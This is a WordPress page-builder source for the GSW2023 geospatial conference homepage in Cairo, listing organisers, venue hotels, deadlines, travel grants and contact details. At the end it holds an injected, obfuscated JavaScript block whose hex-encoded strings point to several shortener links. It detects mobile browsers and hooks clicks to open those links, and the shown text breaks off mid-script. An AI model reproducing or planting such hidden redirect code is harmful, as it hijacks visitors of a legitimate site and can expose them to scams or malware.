prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1685791591251{margin-top: 260px !important;}\"]</p>\n<p style=\"text-align: center;\"><img class=\"alignnone wp-image-2271\" src=\"https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png\" alt=\"\" width=\"105\" height=\"104\" /></p>\n<div class=\"aio-icon-header\">\n<h4 class=\"aio-icon-title ult-responsive\" style=\"text-align: center;\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-title\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;desktop:22px;&quot;,&quot;line-height&quot;:&quot;desktop:32px;&quot;}\"><span style=\"font-size: 14pt;\"><strong>Prof. Ismail AbdelGhafar</strong></span></h4>\n</div>\n<div class=\"aio-icon-description ult-responsive\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-description\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;&quot;,&quot;line-height&quot;:&quot;&quot;}\">\n<p style=\"text-align: center;\"><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></p>\n</div>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\"][vc_column_text css=\".vc_custom_1685791357227{margin-top: 220px !important;}\"]</p>\n<div class=\"aio-icon-header\">\n<h4 class=\"aio-icon-title ult-responsive\" style=\"text-align: center;\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-title\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;desktop:22px;&quot;,&quot;line-height&quot;:&quot;desktop:32px;&quot;}\"><span style=\"font-size: 14pt;\"><strong><img class=\"alignnone wp-image-4613\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/dr-alaa.jpg\" alt=\"\" width=\"80\" height=\"106\" /></strong></span></h4>\n<div class=\"aio-icon-header\">\n<h4 style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong>Prof. Dr. Alaa A. Abdelbary</strong></span></h4>\n</div>\n<div class=\"aio-icon-description ult-responsive\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-description\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;&quot;,&quot;line-height&quot;:&quot;&quot;}\">\n<p style=\"text-align: center;\"><span style=\"font-size: 8pt;\"><strong>Chairman of the local organizing committee GSW2023, Egypt</strong></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 8pt;\"><strong>Vice President for Postgraduates Studies and Scientific Research</strong></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 8pt;\"><strong>Arab Academy for Science, Technology&amp; Maritime Transport</strong></span></p>\n</div>\n</div>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\"][vc_column_text css=\".vc_custom_1685791546373{margin-top: 220px !important;}\"]</p>\n<div class=\"aio-icon-header\">\n<div class=\"aio-icon-header\">\n<div class=\"aio-icon-header\">\n<h4 class=\"aio-icon-title ult-responsive\" style=\"text-align: center;\" data-ultimate-target=\"#Info-box-wrap-9929 .aio-icon-title\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;desktop:22px;&quot;,&quot;line-height&quot;:&quot;desktop:32px;&quot;}\"><span style=\"font-size: 14pt;\"><img class=\"alignnone wp-image-2272\" src=\"https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg\" alt=\"\" width=\"106\" height=\"106\" /></span></h4>\n<h4 class=\"aio-icon-title ult-responsive\" style=\"text-align: center;\" data-ultimate-target=\"#Info-box-wrap-9929 .aio-icon-title\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;desktop:22px;&quot;,&quot;line-height&quot;:&quot;desktop:32px;&quot;}\"><span style=\"font-size: 14pt;\">Prof. Naser El-Sheimy</span></h4>\n</div>\n</div>\n<div class=\"aio-icon-description ult-responsive\" data-ultimate-target=\"#Info-box-wrap-9929 .aio-icon-description\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;&quot;,&quot;line-height&quot;:&quot;&quot;}\">\n<p style=\"text-align: center;\"><strong>Geospatial Week Director ,The University of Calgary</strong></p>\n</div>\n</div>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"full\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1684379817578{margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper submission (Annals): April 30, 2023 </strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper Author notification: June 15, 2023</strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Abstract submission (Archives): May 15, 2023</strong></li>\n</ul>\n<p><strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: June 15, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1685735404108{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 12pt;\"><strong>Travel Grants by the ISPRS Foundation for GSW’2023, 2-7 September 2023 </strong></span></h5>\n<ul>\n<li style=\"text-align: left;\">Deadline for submission of travel grant applications : June 16, 2023</li>\n<li style=\"text-align: left;\">Decision and notification of successful applicants : July 15, 2023</li>\n<li style=\"text-align: left;\">Notification of acceptance of travel grant to Operations Officer : July 30, 2023</li>\n</ul>\n<p>[/vc_column_text][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686317472179{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686317489572{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][vc_column width=\"1/2\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return 